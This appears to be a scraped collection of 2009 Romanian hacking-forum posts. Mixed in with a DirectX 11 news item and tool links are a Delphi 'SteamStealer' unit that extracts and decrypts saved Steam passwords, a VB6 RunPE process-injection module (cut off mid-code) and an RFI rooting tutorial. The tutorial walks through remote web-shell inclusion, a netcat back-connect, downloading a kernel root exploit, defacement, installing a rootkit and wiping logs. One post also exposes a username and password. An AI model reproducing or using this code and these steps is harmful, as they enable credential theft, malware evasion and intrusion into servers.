Nytro

Windows 7 va avea "grafica" DirectX 11 de Mina Hutterer | 7 august 2009 Prin Windows 7, Microsoft doreste sa ofere un sistem de operare capabil sa foloseasca eficient hardware-ul video din sistem. Compania colaboreaza strans cu NVIDIA si AMD (ATI) pentru a se asigura ca nu va exista niciun fel de problema intre Windows 7 DirectX 11 si driverele placilor cu chipset GeForce si Radeon. Unul dintre avantajele principale ale lui DirectX 11 este, de exemplu, posibilitatea sistemului de operare de a reda material video fara a solicita CPU-ul - direct prin placa grafica. Mai mult decat atat, un reprezentant AMD afirma ca DirectX 11 va permite un nivel de realism in jocuri imposibil pana acum. AMD are planuri sa lanseze primele placi compatibile cu DirectX 11 in octombrie 2009, odata cu lansarea lui Windows 7. Iata caracteristicile principale ale lui DirectX 11: o Full support (including all DX11 hardware features) on Windows Vista as well as future versions of Windows o Compatibility with DirectX 10 and 10.1 hardware, as well as support for new DirectX 11 hardware o New compute shader technology that lays the groundwork for the GPU to be used for more than just 3D graphics, so that developers can take advantage of the graphics card as a parallel processor o Multi-threaded resource handling that will allow games to better take advantage of multi-core machines o Support for tessellation, which blurs the line between super high quality pre-rendered scenes and scenes rendered in real-time, allowing game developers to refine models to be smoother and more attractive when seen up close

Cryptosy Mod By Smokin3000 Download: http://www.2shared.com/file/7135910/43a75220/Cryptosy_Mod_By_Smokin3000.html

'--------------------------------------------------------------------------------------- ' Module : mLockedFiles ' DateTime : 11/08/2009 02:10 ' Author : SqUeEzEr ' Mail : scott_van_dinter@hotmail.com@hotmail.com ' Purpose : Close filehandles owned by other processes ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Reference : Deleting locked files ' http://www.codeguru.com/cpp/w-p/files/fileio/article.php/c1287 ' ' History : 11/08/2009 First Cut.................................................... '--------------------------------------------------------------------------------------- Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long Private Declare Function NtDuplicateObject Lib "NTDLL.DLL" (ByVal hSourceProcess As Long, ByVal hSourceHandle As Long, ByVal hCopyProcess As Long, CopyHandle As Long, ByVal DesiredAccess As Long, ByVal Attributes As Long, ByVal Options As Long) As Long Private Declare Function NtClose Lib "NTDLL.DLL" (ByVal ObjectHandle As Long) As Long Public Declare Function CreateToolhelp32Snapshot Lib "Kernel32.dll" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long Public Declare Function Process32First Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long Public Declare Function Process32Next Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long Public Declare Function CloseHandle Lib "Kernel32.dll" (ByVal hObject As Long) As Long Public Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long Public Declare Function RtlAdjustPrivilege Lib "ntdll" (ByVal Privilege As Long, ByVal Enable As Boolean, ByVal Client As Boolean, WasEnabled As Long) As Long Public Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long ' Identifier of the process th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * 260 End Type Private Const FILE_FLAG_BACKUP_SEMANTICS As Long = &H2000000 Private Const GENERIC_ALL As Long = &H10000000 Private Const FILE_SHARE_READ As Long = &H1& Private Const FILE_SHARE_WRITE As Long = &H2& Private Const OPEN_EXISTING As Long = 3& Private Const DUPLICATE_CLOSE_SOURCE = &H1 Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Public Const TH32CS_SNAPPROCESS As Long = &H2 Public Function Closehandles(sFileName As String) As Boolean Dim hFile As Long Dim pInfo As PROCESSENTRY32 Dim hSnapshot As Long Dim lSuccess As Long Dim lRet As Long Dim hProcess As Long Call RtlAdjustPrivilege(20, True, True, 0) hFile = CreateFile(sFileName, GENERIC_ALL, FILE_SHARE_WRITE And FILE_SHARE_READ, 0&, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, 0&) hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) pInfo.dwSize = Len(pInfo) lSuccess = Process32First(hSnapshot, pInfo) If hSnapshot = -1 Then Debug.Print "Unable to take snapshot of process list!" Else Do While lSuccess <> 0 hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, pInfo.th32ProcessID) Call NtDuplicateObject(hProcess, hFile, 0, ByVal 0, 0, 0, DUPLICATE_CLOSE_SOURCE) Call NtClose(hProcess) pInfo.dwSize = Len(pInfo) lSuccess = Process32Next(hSnapshot, pInfo) Loop lRet = CloseHandle(hSnapshot) End If Closehandles = True End Function Usage: If Closehandles("C:\file.txt") Then Kill "C:\file.txt"

While many ActiveX components are slowly being replaced with technologies considered more secure and/or web-mature, many developers still utililise ActiveX controls as a quick way to push advanced functionality out to web browsers. ActiveX security is based on digital signatures, if you trust the source of the component then it is safe to run the control. That said, when the control is run, it runs like any other Win32 desktop application and has access to the same resources, unlike Java, which executes inside a safe environment known as a “sandbox”, thus limiting what the Applet has access to. Well that’s how the sandbox works in theory at least. In other words, you better trust the authors of the ActiveX component. In this paper, I won’t be focusing on the ActiveX security model, but rather on the identification of vulnerabilities in the ActiveX control itself, not in the way the control interacts with its environment. This is an interesting topic, as the presence of such vulnerabilities could enable malicious individuals to compromise a user’s computer, simply by guiding them to a malicious web site. In other words, no actions, on the part of the user, are required for remote code execution. The paper ( by shape ) can be viewed here: http://blog.sat0ri.com/wp-content/uploads/2009/08/Identifying-Vulnerabilities-in-ActiveX-Controls.pdf

Gata, am inteles cum sta treaba si cred ca am facut si pace.

De curiozitate, care e rtatul care copiaza de pe acest forum?

Da, si raspunsurile imi par cunoscute Copil fara viitor. PS: Care mm scrie cu contul meu? User: Nytro Pass: adminxxx

White Hat Hacking course, part 1: http://www.tudy.ro/2008/11/15/white-hat-hacking-course-part-1/ White Hat Hacking course, part 2: http://www.tudy.ro/2008/11/24/white-hat-hacking-part-2/ White Hat Hacking, part 3: http://www.tudy.ro/2008/12/05/white-hat-hacking-part-3/

by -bRx- Function UltimoNickUsadoInGame:String; = latest nick in game Function UserCounterStrikeRate:String; = latest rate set by user Function DiretorioDaSteam:String; = steam directory Function DiretorioDoExecutavelSteam:String; = exe steam dir Function ConfiguracaoDeIdioma:String; = language Function EnviarDadosSTEAM:String; all results in this function {********************************************************************************************* *-----------=*@@=------------------*@@*.----------------------------------------------------* *----------.@@@@@@@%-.-------------@@@@@@@#=------------- ::--------@#-.--------------------* *-----------=@@@*-@@@@@@@@#:---------@@@@#@@@@@#+: -----@@@@#------@@@@=--------------------* *------------#@@@----- :-%@@@@--------@@@=---#%@@@@-- =@@@@@@@:---#@@@+---------------------* *- .:- ---@@@#-------:@@@%---------+@@*----*@@@%@@@@@@@*@@@%-+@@@*------- .:-:------* *@@@@@@@@@=----@@@ ----*@@@@%#@@@@@@@@#:#@@#:@@@@@@@#-@@@%-- @@@@@@@--------@@@@@@@@@@------* *#%%@@@#*------=@@%--@@@@@@@@@@@%#%@@@@@@@@@@@@@@+.--*@@*----- @@@@@ -------*%@%@@%#+-------* *---------------@@@@@@@@@#-.---------=@@@@@@@@.-----#@@*------=@@@@@@@.---------------------* *-------------+@@@@@%: ---------------@@@@+@@@------@@@------*@@@: @@@@#--------------------* *------------.#+.@@@*-----------------@@@@-=@@%----@@@------+@@@-----@@@@+------------------* *----------------=@@@----------------%@@@ --#=.---+@@+------@@@+------#@@@@.----------------* *----------------.@@@--------------*@@@@----------@@@-----:@@@#-------- @@@@#---------------* *-----------------#- --------- -%@@@@%:-----------@@%------@@@------+#@@@@@@@@+-------------* *--------------.-=:.:-=+*%@@@@@@@@#---------------@@%---------------@@@@%*=-:::-------------* *--------------- .-=**%%%%#*+:.-------------------@@@----------------- ---------------------* *-------------------------------------------------.@@ --------------------------------------* ********************************************************************************************* Author: counterstrikewi and -bRx- please give credits case of use it } unit SteamStealerUnitBybRx; interface uses Windows, CompressionStreamUnit; type LongRec = packed record case Integer of 0: (Lo, Hi: Word); 1: (Words: array [0..1] of Word); 2: (Bytes: array [0..3] of Byte); end; { TStringStream } TStringStream = class(TStream) private FDataString: string; FPosition: Integer; protected procedure SetSize(NewSize: Longint); override; public constructor Create(const AString: string); function Read(var Buffer; Count: Longint): Longint; override; function ReadString(Count: Longint): string; function Seek(Offset: Longint; Origin: Word): Longint; override; function Write(const Buffer; Count: Longint): Longint; override; procedure WriteString(const AString: string); property DataString: string read FDataString; end; const { File open modes } {$IFDEF LINUX} fmOpenRead = O_RDONLY; fmOpenWrite = O_WRONLY; fmOpenReadWrite = O_RDWR; // fmShareCompat not supported fmShareExclusive = $0010; fmShareDenyWrite = $0020; // fmShareDenyRead not supported fmShareDenyNone = $0030; {$ENDIF} {$IFDEF MSWINDOWS} fmOpenRead = $0000; fmOpenWrite = $0001; fmOpenReadWrite = $0002; fmShareCompat = $0000 platform; // DOS compatibility mode is not portable fmShareExclusive = $0010; fmShareDenyWrite = $0020; fmShareDenyRead = $0030 platform; // write-only not supported on all platforms fmShareDenyNone = $0040; {$ENDIF} function SteamUserName : String; function SteamPassword : String; Function UltimoNickUsadoInGame:string; Function UserCounterStrikeRate:string; Function DiretorioDaSteam:string; Function DiretorioDoExecutavelSteam:string; Function ConfiguracaoDeIdioma:string; Function EnviarDadosSTEAM:string; type TSteamDecryptDataForThisMachine = function(EncryptedData :Pchar; EncryptedDataLength : Integer; DecryptedBuffer : Pointer; DecryptedBufferSize : Integer; DecryptedDataSize : PUINT) : Integer; cdecl; var SteamPath : String; StringStream : TStringStream; FileStream : TFileStream; I : Integer; UserName : PChar; EncryptedPassword : PChar; DecryptionKey : TSteamDecryptDataForThisMachine; PasswordLength : UINT; Password : array[0..99] of char; implementation function PegaValor( const Key: HKEY; const Chave, Valor: String ) : String; var handle : HKEY; Tipo, Tam : Cardinal; Buffer : String; begin RegOpenKeyEx( Key, PChar( Chave ),0, KEY_ALL_ACCESS, handle ); Tipo := REG_NONE; RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,nil,@Tam ); SetString(Buffer, nil, Tam); RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,PByte(PChar(Buffer)),@Tam ); Result := PChar(Buffer); RegCloseKey( handle ); Result := PChar(Buffer); end; procedure FreeAndNil(var Obj); var Temp: TObject; begin Temp := TObject(Obj); Pointer(Obj) := nil; Temp.Free; end; { TStringStream } constructor TStringStream.Create(const AString: string); begin inherited Create; FDataString := AString; end; function TStringStream.Read(var Buffer; Count: Longint): Longint; begin Result := Length(FDataString) - FPosition; if Result > Count then Result := Count; Move(PChar(@FDataString[FPosition + 1])^, Buffer, Result); Inc(FPosition, Result); end; function TStringStream.Write(const Buffer; Count: Longint): Longint; begin Result := Count; SetLength(FDataString, (FPosition + Result)); Move(Buffer, PChar(@FDataString[FPosition + 1])^, Result); Inc(FPosition, Result); end; function TStringStream.Seek(Offset: Longint; Origin: Word): Longint; begin case Origin of soFromBeginning: FPosition := Offset; soFromCurrent: FPosition := FPosition + Offset; soFromEnd: FPosition := Length(FDataString) - Offset; end; if FPosition > Length(FDataString) then FPosition := Length(FDataString) else if FPosition < 0 then FPosition := 0; Result := FPosition; end; function TStringStream.ReadString(Count: Longint): string; var Len: Integer; begin Len := Length(FDataString) - FPosition; if Len > Count then Len := Count; SetString(Result, PChar(@FDataString[FPosition + 1]), Len); Inc(FPosition, Len); end; procedure TStringStream.WriteString(const AString: string); begin Write(PChar(AString)^, Length(AString)); end; procedure TStringStream.SetSize(NewSize: Longint); begin SetLength(FDataString, NewSize); if FPosition > NewSize then FPosition := NewSize; end; function StrLen(const Str: PChar): Cardinal; assembler; asm MOV EDX,EDI MOV EDI,EAX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB MOV EAX,0FFFFFFFEH SUB EAX,ECX MOV EDI,EDX end; function FileAge(const FileName: string): Integer; {$IFDEF MSWINDOWS} var Handle: THandle; FindData: TWin32FindData; LocalFileTime: TFileTime; begin Handle := FindFirstFile(PChar(FileName), FindData); if Handle <> INVALID_HANDLE_VALUE then begin Windows.FindClose(Handle); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime); if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi, LongRec(Result).Lo) then Exit; end; end; Result := -1; end; {$ENDIF} {$IFDEF LINUX} var st: TStatBuf; begin if stat(PChar(FileName), st) = 0 then Result := st.st_mtime else Result := -1; end; {$ENDIF} function FileExists(const FileName: string): Boolean; {$IFDEF MSWINDOWS} begin Result := FileAge(FileName) <> -1; end; {$ENDIF} {$IFDEF LINUX} begin Result := euidaccess(PChar(FileName), F_OK) = 0; end; {$ENDIF} // Senha:=PegaValor(HKEY_LOCAL_MACHINE,'Software\Vitalwerks\DUC','Password'); function SteamUserName : String; begin try SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); //Locates UserName within the SteamAppData.vdf file FileStream := TFileStream.Create(SteamPath+'\config\SteamAppData.vdf',fmOpenRead); StringStream := TStringStream.Create(''); StringStream.CopyFrom(FileStream, FileStream.Size); FreeandNil(FileStream); I := Pos('AutoLoginUser',StringStream.DataString); I := I + 17; UserName := PChar(copy(StringStream.DataString,I,Pos('"',copy(StringStream.DataString,I,100))-1)); FreeandNil(StringStream); Result := UserName; except Result := 'Error'; end; end; function SteamPassword : String; begin try SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); //Locates Encrypted Password within the ClientRegistry.blob file if not FileExists(SteamPath+'/ClientRegistry.Blob') then begin Result := 'Não foi possível encontrar o arquivo necessário para pegar o password.' ;Exit; end else begin FileStream := TFileStream.Create(SteamPath+'\ClientRegistry.blob',fmOpenRead); StringStream := TStringStream.Create(''); StringStream.CopyFrom(FileStream, FileStream.Size); FreeandNil(FileStream); I := Pos('Phrase',StringStream.DataString); I := I + 40; EncryptedPassword := PChar(copy(StringStream.DataString,I,255)); FreeandNil(StringStream); //Uses SteamDecryptDataForThisMachine function from Steam.dll to decrypt password DecryptionKey := GetProcAddress(LoadLibrary(PChar(SteamPath+'\steam.dll')),'SteamDecryptDataForThisMachine'); DecryptionKey(EncryptedPassword, strlen(EncryptedPassword),@Password, 100,@PasswordLength); Result := Password; end; except Result := 'Error'; end; end; Function UltimoNickUsadoInGame:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','LastGameNameUsed'); End; Function UserCounterStrikeRate:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Rate'); End; Function DiretorioDaSteam:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); End; Function DiretorioDoExecutavelSteam:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamExe'); End; Function ConfiguracaoDeIdioma:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language'); End; Function EncontrouSteam:Boolean; var VerificaString:string; Begin Result := False; VerificaString := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language'); if VerificaString<>'' then Result := True else Result := False; End; Function EnviarDadosSTEAM:string; var Enter:string; Begin Enter := #13#10; if EncontrouSteam then begin Result := 'Login: '+SteamUserName + Enter + 'Senha: '+SteamPassword + Enter + 'Ultimo Nick usado: '+UltimoNickUsadoInGame + Enter + 'Rate do Usuário: ' +UserCounterStrikeRate + Enter + 'Diretório da Steam: '+DiretorioDaSteam + Enter + 'Diretório do Executavel Steam: '+DiretorioDoExecutavelSteam + Enter + 'Configuração de Idioma do Usuário: '+ConfiguracaoDeIdioma + Enter ; end else Result := 'Não foi possível encontrar os dados. Possíveis causas: Diretório da steam ou DLL não encontrada, ou talvez o arquivo esteja sendo usada por outro processo'; end; end. Download: http://www.2shared.com/file/7117962/32213e20/SteamStealer.html

by mjrod5: You can flame me or whatever you want... Here is code i made =) Seems like delphi doesnt support invoke, only call xP Have fun doing nothing with this program InlineASM; uses Windows; var _msg: String = 'Inline ASM, Delphi'; _cpt: String = 'woot!'; begin asm //MessageBox: function(hWnd: HWND; lpText, lpCaption: PAnsiChar; uType: UINT): Integer; push 0 //uType push _cpt //lpCaption push _msg //lpText push 0 //hWnd call messagebox //Call the MessageBoxAPI with params you pushed //Delphi Equivalent would be //MessageBox(0,PChar(_msg),PChar(_cpt),0); end; end.

Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long Private Type OSVERSIONINFO OSVersionInfoSize As Long MajorVersion As Long MinorVersion As Long BuildNumber As Long PlatformId As Long szCSDVersion As String * 128 End Type Private Type OSVERSIONINFOEX dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128 wServicePackMajor As Integer wServicePackMinor As Integer wSuiteMask As Integer wProductType As Byte wReserved As Byte End Type Public Function GetWindowsVersion() As String Dim OS As OSVERSIONINFO Dim durum As Boolean Dim version As String OS.OSVersionInfoSize = Len(OS) durum = GetVersionEx(OS) version = OS.PlatformId & "." & OS.MajorVersion & "." & OS.MinorVersion Select Case version Case "1.4.0" GetWindowsVersion = "Win 95" Case "1.4.10" GetWindowsVersion = "Win 98" Case "1.4.98" GetWindowsVersion = "Win ME" Case "2.3.51" GetWindowsVersion = "Win NT 3" Case "2.4.0" GetWindowsVersion = "Win NT 4" Case "2.5.0" GetWindowsVersion = "Win 2000" Case "2.5.1" GetWindowsVersion = "Win XP" Case "2.6.0" GetWindowsVersion = "Win Vista" Case "2.6.1" GetWindowsVersion = "Win Seven" Case Else GetWindowsVersion = "Unknown" End Select End Function Private Sub Form_Load() MsgBox GetWindowsVersion() End Sub

DIE (Detect it Easy) detects most common packers, cryptors and compilers for PE files. Download: http://www.2shared.com/file/7117852/18ce07d4/Detect_it_easy.html

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF) Author: An@sA_StAxtH R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF) Author: An@sA_StAxtH Mail/MSN: admin@cyberanarchy.org / anasa_staxth@hotmail.com For Cyber Anarchy (Nov. 2007) ----------------------------------------------------------------------- You will need: - Vulnerable Site in R.F.I. - Shell for R.F.I. (e.g. c99, r57 or other) - NetCat - Local Root Exploit (depending on the kernel and the version) This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF. Suppose that we have found a site with R.F.I. vulnerability: http://www.hackedsite.com/folder/index.html?page= e can run shell exploiting Remote File Inclusion, as follows: http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt? where evilscript.txt is our web shell that we have already uploaded to our site. (www.mysite.com in the folder: shells) After we enter in shell, first of all we will see the version of the kernel at the top of the page or by typing: uname - a in Command line. To continue we must connect with backconnection to the box. This can done with two ways if we have the suitable shell. We can use the Back-Connect module of r57/c99 shell or to upload a backconnector in a writable folder In most of the shells there is a backconnection feature without to upload the Connect Back Shell (or another one shell in perl/c). We will analyze the first way which is inside the shell (in our example the shell is r57). Initially we open NetCat and give to listen in a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) with the following way: We will type: 11457 in the port input (This is the default port for the last versions of r57 shell). We can use and other port. We press in Windows Start -> Run -> and we type: cmd After we will go to the NetCat directory: e.g. cd C:\Program Files\Netcat And we type the following command: nc -n -l -v -p 11457 NetCat respond: listening on [any] 11457 ... In the central page of r57 shell we find under the following menu::: Net:: and back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if we have dynamic) In the Port form we will put the port that we opened and NetCat listens. If we press connect the shell will respond: Now script try connect to <IP here> port 11457 ... If our settings are correct NetCat will give us a shell to the server Now we wil continue to the Rooting proccess. We must find a writable folder in order to download and compile the Local Root Exploit that will give us root priviledges in the box. Depending on the version of the Linux kernel there are different exploits. Some times the exploits fail to run because some boxes are patched or we don't have the correct permissions. List of the exploits/kernel: 2.4.17 -> newlocal, kmod, uselib24 2.4.18 -> brk, brk2, newlocal, kmod 2.4.19 -> brk, brk2, newlocal, kmod 2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2 2.4.21 -> brk, brk2, ptrace, ptrace-kmod 2.4.22 -> brk, brk2, ptrace, ptrace-kmod 2.4.22-10 -> loginx 2.4.23 -> mremap_pte 2.4.24 -> mremap_pte, uselib24 2.4.25-1 -> uselib24 2.4.27 -> uselib24 2.6.2 -> mremap_pte, krad, h00lyshit 2.6.5 -> krad, krad2, h00lyshit 2.6.6 -> krad, krad2, h00lyshit 2.6.7 -> krad, krad2, h00lyshit 2.6.8 -> krad, krad2, h00lyshit 2.6.8-5 -> krad2, h00lyshit 2.6.9 -> krad, krad2, h00lyshit 2.6.9-34 -> r00t, h00lyshit 2.6.10 -> krad, krad2, h00lyshit 2.6.13 -> raptor, raptor2, h0llyshit, prctl 2.6.14 -> raptor, raptor2, h0llyshit, prctl 2.6.15 -> raptor, raptor2, h0llyshit, prctl 2.6.16 -> raptor, raptor2, h0llyshit, prctl We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit. Some sites that we can find Local Root Exploits: www.milw0rm (Try Search: "linux kernel") Other sites: www.packetstormsecurity.org | www.arblan.com or try Googlin' you can find 'em all We can find writable folders/files by typing: find / -perm -2 -ls We can use the /tmp folder which is a standard writable folder We type: cd /tmp To download the local root exploit we can use a download command for linux like wget. For example: wget http://www.arblan.com/localroot/h00lyshit.c where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit. After the download we must compile the exploit (Read the instruction of the exploit before the compile) For the h00lyshit we must type: gcc h00lyshit.c -o h00lyshit Now we have created the executable file: h00lyshit. The command to run this exploit is: ./h00lyshit <very big file on the disk> We need a very big file on the disk in order to run successfully and to get root. We must create a big file in /tmp or into another writable folder. The command is: dd if=/dev/urandom of=largefile count=2M where largefile is the filename. We must wait 2-3 minutes for the file creation If this command fails we can try: dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024 Now we can procced to the last step. We can run the exploit by typing: ./h00lyshit largefile or ./h00lyshit /tmp/largefile (If we are in a different writable folder and the largefile is created in /tmp) If there are not running errors (maybe the kernel is patched or is something wrong with exploit run or large file) we will get root To check if we got root: id or whoami If it says root we got root! Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g. SSHDoor) and to take ssh/telnet shell access to the server. We must erase all logs in order to be safe with a log cleaner. A good cleaner for this job is the MIG Log Cleaner. <An@sA_StAxtH> <admin@cyberanarchy.org> * <www.cyberanarchy.org>

Ultrasurf V9.5 (100% Anonymous Surfing!) Privacy Protect Internet privacy with anonymous surfing and browsing -- hide IP addresses and locations, clean browsing history, cookies & more ... Security Completely transparent data transfer and high level encryption of the content allow you to surf the web with high security. Freedom UltraSurf allows you to overcome the censorship and blockage on the Internet. You can browse any website freely, so as to obtain true information from the free world. With this program you can change the proxies of internet explorer and can be tucked into the pages you have locked the computer administrators at such schools, libraries and other ... to operate the open and wait until To write successfully connected to server! then open the internet explorer go to any page you want and we are locked! You can also use it as normal and Proxy Server in Internet Explorer to surf 100% anonymously online. Download: http://www.mediafire.com/download.php?jyjtymyjyvm

Cine are chmod 777, folderul in care se afla toate fisierele?

Da, ea e, am fost la un concurs in Tg. Jiu si a fost si ea.

Asta e ea:

by Karcrack ( modded cobein's RunPE ) Native & Just RtlMoveMemory '--------------------------------------------------------------------------------------- ' Module : cNtPEL ' DateTime : 30/06/2009 06:32 ' Author : Cobein ' Mail : cobein27@hotmail.com ' WebPage : http://www.advancevb.com.ar (updated =D) ' Purpose : Inject Exe ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Thanks to : This is gonna be a looong list xD ' Batfitch - kernel base asm ' Karcrack - For helping me to debug and test it ' Paul Caton - vTable patch examples ' rm_code - First call api prototype ' and different books and pappers ' ' Compile : P-Code !!! ' ' Comments : Coded on top of the invoke module. ' ' History : 30/06/2009 First Cut.................................................... ' 02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........ '--------------------------------------------------------------------------------------- Option Explicit Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D& Private Const IMAGE_NT_SIGNATURE As Long = &H4550& Private Const SIZE_DOS_HEADER As Long = &H40 Private Const SIZE_NT_HEADERS As Long = &HF8 Private Const SIZE_EXPORT_DIRECTORY As Long = &H28 Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28 Private Const THUNK_APICALL As String = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3" Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3" Private Const PATCH1 As String = "<PATCH1>" Private Const PATCH2 As String = "<PATCH2>" Private Const CONTEXT_FULL As Long = &H10007 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type Private Type FLOATING_SAVE_AREA ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector As Long RegisterArea(1 To 80) As Byte Cr0NpxState As Long End Type Private Type CONTEXT ContextFlags As Long Dr0 As Long Dr1 As Long Dr2 As Long Dr3 As Long Dr6 As Long Dr7 As Long FloatSave As FLOATING_SAVE_AREA SegGs As Long SegFs As Long SegEs As Long SegDs As Long Edi As Long Esi As Long Ebx As Long Edx As Long Ecx As Long Eax As Long Ebp As Long Eip As Long SegCs As Long EFlags As Long Esp As Long SegSs As Long End Type Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer Characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_EXPORT_DIRECTORY Characteristics As Long TimeDateStamp As Long MajorVersion As Integer MinorVersion As Integer lpName As Long Base As Long NumberOfFunctions As Long NumberOfNames As Long lpAddressOfFunctions As Long lpAddressOfNames As Long lpAddressOfNameOrdinals As Long End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer Characteristics As Long End Type Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long) Private c_lKrnl As Long Private c_lLoadLib As Long Private c_bInit As Boolean Private c_lVTE As Long Private c_lOldVTE As Long Private c_bvASM(&HFF) As Byte Public Function zDoNotCall() As Long 'This function will be replaced with machine code laterz 'Do not add any public procedure on top of it End Function Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean Dim i As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER Dim tSTARTUPINFO As STARTUPINFO Dim tPROCESS_INFORMATION As PROCESS_INFORMATION Dim tCONTEXT As CONTEXT Dim lKernel As Long Dim lNTDll As Long Dim lMod As Long If Not c_bInit Then Exit Function Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER) If Not 